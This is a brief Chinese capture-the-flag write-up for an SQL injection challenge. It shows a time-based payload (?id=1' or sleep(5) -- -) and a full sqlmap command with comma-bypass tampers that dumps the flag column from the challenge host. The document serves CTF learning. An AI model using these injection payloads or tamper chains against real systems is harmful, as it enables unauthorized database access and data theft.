24/5/15 SQLi&逗号过滤

Fenglilinglegeluan 于 2024-05-15 发布 浏览量

题目:SQLi

小坑

抓包发现302跳转,实际页面是l0gin.php?id=1

20240515-102614-001

20240515-102954-002

开始注入

  1. ?id=1' or sleep(5) -- -发现存在注入,没有过滤单引号

  2. 之后尝试,发现过滤了,,并且,后面的所有输入的字符都会被删除。

绕过逗号过滤

tamper

commalessmid
commalesslimit
ifnull2casewhenisnull

sqlmap 得出flag

 sqlmap -u "http://eci-2zeclhdvg07b0cztl6y4.cloudeci1.ichunqiu.com/l0gin.php?id=1" -p "id" --level=5 -v 3 --tamper=commalessmid,commalesslimit,ifnull2casewhenisnull -D sqli -T users -C flag_9c861b688330 --dump

image-20240513215633562